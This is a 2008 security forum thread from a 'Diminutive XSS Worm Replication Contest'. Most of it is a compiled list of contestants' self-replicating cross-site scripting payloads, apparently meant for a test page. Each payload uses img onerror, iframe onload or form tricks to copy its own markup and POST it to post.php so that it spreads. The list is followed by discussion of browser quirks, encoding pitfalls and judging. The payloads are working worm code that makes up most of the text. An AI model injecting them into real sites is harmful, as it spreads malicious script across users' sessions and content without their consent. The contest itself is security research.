<p/id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('Content-type','application/x-www-form-urlencoded'),send('content=<p/id=_>'+_.innerHTML.replace(/\+/g,"%2B")+'</p>')</script></p>

digi7al64 - 140

<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>

gareth

<img src="" onerror="appendChild(cloneNode(0));i=innerHTML,h=new XMLHttpRequest;h.open('POST','post.php');h.send('content='+i)">

matt presson (via gareth)

<img src="" onerror="alert('xss');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send('content='+i)">

gareth

<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">

gareth

<img src="" onerror="appendChild(cloneNode(0));i=innerHTML;with(appendChild(createElement('form')))submit(alert('XSS'),innerHTML='<textarea name=content>'+i,action=(method='post')+'.php')">

ma1 - 209

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"

ma1 - 140

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),137)))"

ma1 - 132

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),129))"

ronald

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

gareth

<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">

ma1 - 203

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),198))"

sdc

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('<content>'+parentNode.innerHTML.bold(alert('xss')+'</content>')"></b>

ronald - 152 (final submission...again)

<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">

ronald - 198 (same post ok)

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

gareth - 149

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">;

ronald (via gareth) - 148

<form><input name='content'><iframe onload="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">

sdc - 149

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

ma1 - 149

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

sdc

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML.replace(/\+/g,'%2B'),submit(alert('XSS'))">

sdc

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+encodeURIComponent(innerHTML),submit(alert('XSS'))">

ma1

 <form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">

sdc

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">

ma1

 <form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">

sdc

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

gareth (via ronald)

<form action="post.php"><img src="" onerror="with(parentNode)appendChild(cloneNode(1));alert(parentNode.innerHTML.slice(103))"></form>

sdc (via .mario) - 166

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML+'</form>',submit(alert('XSS'))"></form>

sdc - 160

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',submit(i[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

spyware - 163

<form><img src="" onerror="i=parentNode,i.action=(i.method='post')+'.php',j=nextSibling,j.value='<form>'+i.innerHTML,i.submit(alert('xss'))"><input name="content">

digi7al64 - 154

<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=<p>',parentNode.innerHTML,'<p>'))"></iframe><p>

doctordan - 154

 „<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=',parentNode.innerHTML.match(/„.+\v/))),alert('XSS')">0x0B

gareth - 133 (final post... again)

<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

digi7al64 (via gareth) - 144

,<b><img src=""onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

gareth

<img src="" onerror="appendChild(cloneNode(1));c=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send(['content=',c].join(''));alert('XSS')">

gareth

<iframe onload="c=['content=','<iframe onload=\42',attributes[0].nodeValue,'\42>'].join('');with(new XMLHttpRequest)open('POST','post.php'),send(c);alert('XSS')">

spyware - 136

ý<form onFocus="submit(alert('xss'))"><input onFocus="id=content,value=document.body.match(/ý.ó/)"><iframe onLoad="parentNode.focus()">ó

------------------------------------

AND THE WINNER IS....... the person(s) that don't have to test all these vectors

FINAL REQUEST: rsnake - I am keenly interested to see a submission from yourself?

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Edited 16 time(s). Last edit at 01/10/2008 06:59AM by digi7al64.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 10, 2008 05:17AM

ah it's just XHR got ya

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 05:30AM

reason I think is that forms have a default enctype set to: you've guessed it: form-urlencoded.

see: http://www.w3.org/TR/html4/interact/forms.html#h-17.13.4

with: echo $_POST['content'];

it works just fine, c'mon PHP 101 here1!!!!! ;) ^^

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 10, 2008 05:47AM

@digi7al64

Thanks for doing all that mate! Maybe in future we need to stick to one post per user to make it easier. (I'm very guilty of multiple posts)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: digi7al64

Date: January 10, 2008 07:01AM

done - MODS, also feel free to mod my post with any updates, missing lengths, notes etc (done up to page 18 so far).

@gareth - np, next comp its up to you :P

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 07:11AM

@digi7al64

Awesome job mate! it really helps and is nice to look back.

FYI again, some execeptions and issues:

- XHR without content-type fails. (no XHR response)
- XHR with a + sign, fails. (+ becomes space, vector perishes)
- img src=. or empty fails. (growth)
- id=. or name=. without quotes fails. (growth)
- id or name selectors are doctype dependant and fail standalone.
- unclosed iframe (exception on a slice) fails. (growth)

- form with + sign, works.
- iframe without src works.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 08:25AM

Quote

FINAL REQUEST: rsnake - I am keenly interested to see a submission from yourself?

Hehe - very nice. Me too!

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: sirdarckcat

Date: January 10, 2008 08:36AM

hehe that's the reason rsnake organized the contest, he has a payload of 100 bytes

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 10, 2008 09:13AM

javascript:with(new XMLHttpRequest)open('POST','post.php'),send(['content=',location].join(''))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Edited 3 time(s). Last edit at 01/10/2008 09:57AM by Gareth Heyes.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 09:29AM

Nice!

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: rsnake

Date: January 10, 2008 09:58AM

Still a few hours till 7PM GMT... I'll be testing the final submission by each person (ONLY) for the sake of declaring a winner quickly. So if you submitted something last that doesn't work, that's unfortunately the way it works.

Regarding the XHR stuff - the final word is, I haven't been able to get it working without the header in FF 2.0.0.11, so if you submitted a vector without it, it won't propagate in my browser. Sorry, I didn't code the browser!

Also +'s will not get encoded to spaces in my tests, so don't worry about encoding them or using concat or anything else.

And as far as me submitting a vector - mine looks an awful lot like one of the first ones done by Ronald (non XHR based) but I since threw it away since you guys have gone far beyond that since then. I've heard similar sentiments by other (well known) people who were going to submit at the last minute but have found that you guys ended up beating them.

Soooo... you have a few hours to submit your final entries! Good luck to everyone!

- RSnake
Gotta love it. http://ha.ckers.org

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: rsnake

Date: January 10, 2008 10:42AM

One last comment about time frames, it will probably take me a few hours to test all of this so although the contest ends at 7PM GMT, I probably won't have the results ready for a while after that. So don't hold your breath. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Matt Presson

Date: January 10, 2008 10:48AM

Feel free to remove mine from testing. I know I didn't win, and it will save you wasting some of your time.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 10, 2008 12:14PM

We all know mario has won, well done! :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: rsnake

Date: January 10, 2008 01:10PM

I will be testing the results now. The contest is officially closed.

- RSnake
Gotta love it. http://ha.ckers.org

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Spyware

Date: January 10, 2008 01:20PM

Hurray, we need to spam this to the next page btw, I want to refresh this topic but it has to load the giant list over and over again, it slows down my browser.

RSnake, happy testing ;x.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 02:36PM

@RSnake

You dont have to test them all of course, 70% can be thrown out the window already due to faulty/absent rules, browser issues, and general mutation mistakes.

@spyware: what crappy browser do you use??? lol better use a real browser, Opera!

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: thrill

Date: January 10, 2008 03:27PM

@spyware: upgrade to links rather than lynx! ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: bwb labs

Date: January 10, 2008 03:37PM

Quote
Ronald
- XHR with a + sign, fails. (+ becomes space, vector perishes)
- img src=. or empty fails. (growth)

You cannot generalize this .. my XMLHttpRequest vectors contains + and in one case uses img src=. but won't fail or grow, since they don't use innerHTML.

Has someone seen a working* XMLHttpRequest vector below 251 bytes? Otherwise I'm the winner in that - nonexistent - category ;-).

* working as in tested, proper content-type and proper encoding.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: ma1

Date: January 10, 2008 03:41PM

bwb labs Wrote:
-------------------------------------------------------
> Has someone seen a working* XMLHttpRequest vector
> below 251 bytes? Otherwise I'm the winner in that
> - nonexistent - category ;-).

209

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 03:51PM

@bwb labs: Yours is an exception on the rule of the XHR, sorry missed that vector, almost everyone used: +parentNode.innerHTML

And to be more exact: for the src=. to become: src='.' or src="." it has to reside in a form vector, XHR vectors seems not affected in my tests.

[dutch] Oftewel: jouw vectors werken uitstekend! jammer dat ma1's versie kleiner is. [/dutch]

Edited 2 time(s). Last edit at 01/10/2008 04:04PM by Ronald.

Options: Reply•Quote